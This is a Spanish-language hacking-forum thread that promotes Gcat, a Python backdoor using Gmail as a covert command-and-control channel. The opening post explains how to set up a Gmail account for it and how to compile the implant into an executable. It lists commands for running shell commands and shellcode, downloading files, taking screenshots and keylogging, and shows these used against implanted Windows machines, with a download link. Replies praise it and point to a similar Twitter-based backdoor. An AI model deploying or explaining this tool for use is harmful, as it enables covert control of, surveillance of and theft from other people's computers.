comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Gcat - Python Backdoor Usando Gmail para Mando y Control

  • 2 Respuestas
  • 3999 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado R3v0lve

  • *
  • Underc0der
  • Mensajes: 80
  • Actividad:
    3.33%
  • Reputación 3
  • No se sale adelante celebrando éxitos sino superan
    • Ver Perfil
  • Skype: антисоціальна
  • Twitter: антисоціальна
« en: Septiembre 21, 2015, 02:53:46 am »
Gcat es un backdoor Python sigiloso que utiliza Gmail como un servidor de comando y control. Es bastante básico en este momento, pero es una interesante prueba de concepto y si la comunidad se puso detrás de ella y contribuyó algunas nuevas características que podría ser una muy poderosa pieza de equipo.

Gcat es un backdoor Python sigiloso

Cuanto a prestaciones que no tiene que mucho, no puedes subir archivos todavía, pero usted puede ejecutar código shell, descargar archivos y capturas de pantalla de captura.

Pero como concepto es genial, el tráfico de correo electrónico? ¿Cuántas organizaciones bloquearán que, sobre todo a los servidores de Google. Camino menos visible que el tráfico típico de IRC.

Setup

Configuración

Para que esto funcione se necesita:

     Una cuenta de Gmail (Utilice una cuenta dedicada! No utilice su ser personal!)
     Encienda "Permitir aplicaciones menos seguras" en virtud de la configuración de seguridad de la cuenta

Este repo contiene dos archivos:


     gcat.py una secuencia de comandos que se utiliza para enumerar y tema ordena a los clientes disponibles
     implant.py la puerta trasera real de implementar

En ambos archivos, editar los gmail_user y gmail_pwd variables con el nombre de usuario y la contraseña de la cuenta que previamente configuración.

Usted está probablemente va a querer compilar implant.py en un archivo ejecutable utilizando PyInstaller.

Opciones

Código: [Seleccionar]
Gcat
 
optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve
 
  -list                 List available clients
  -info                 Retrieve info on specified client
 
Commands:
  Commands to execute on an implant
 
  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Usando Gcat

Código: [Seleccionar]
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

Una vez que haya implementado la puerta de atrás en un par de sistemas, puede comprobar los clientes disponibles utilizando el comando list:

La salida es una cadena UUID que identifica de forma exclusiva el sistema y el sistema operativo el implante se está ejecutando en

Vamos a emitir un comando a un implante:

Código: [Seleccionar]
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Aquí le estamos diciendo 90b2cd83-cb36-52de-84ee-99db6ff41a11 ejecutar ipconfig / all, el guión y luego da salida a la JobID que podemos utilizar para recuperar la salida de ese comando

Permite obtener los resultados!

Código: [Seleccionar]
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv 
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
 
 
Windows IP Configuration
 
        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
 
-- SNIP --

Downlaod Github : https://github.com/byt3bl33d3r/gcat/archive/master.zip
FUENTES: http://www.darknet.org.uk/2015/09/gcat-python-backdoor-using-gmail-for-command-control/
Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5406
  • Actividad:
    11.67%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Noviembre 18, 2015, 08:29:02 am »
Que buen aporte @R3v0lve!! Muchisimas gracias!
Te dejaré +c0in

Saludos!
ANTRAX


Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #2 en: Noviembre 18, 2015, 08:52:40 pm »
:3 Muy lindo, hay algo parecido pero utilizando twitter, pueden leer sobre eso aquí para los interesados

http://www.hackplayers.com/2015/09/twittor-un-backdoor-escrito-en-python-que-usa-twitter.html
« Última modificación: Noviembre 18, 2015, 08:55:10 pm por Stuxnet »

 

¿Te gustó el post? COMPARTILO!



Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 3694
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248
SAPYTO – Framework para realizar Penetration Tests sobre sistemas SAP

Iniciado por ZanGetsu

Respuestas: 1
Vistas: 1668
Último mensaje Mayo 20, 2013, 08:49:26 pm
por D4rkC0d3r
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2313
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
Routerpwn, un framework para explotar dispositivos embebidos desde tu celular

Iniciado por hkm

Respuestas: 2
Vistas: 2095
Último mensaje Agosto 01, 2011, 11:45:43 pm
por JaAViEr
Tool para sacar Todos! los archivos de configuracion de un servidor

Iniciado por ANTRAX

Respuestas: 3
Vistas: 2737
Último mensaje Agosto 30, 2012, 01:28:32 pm
por hdbreaker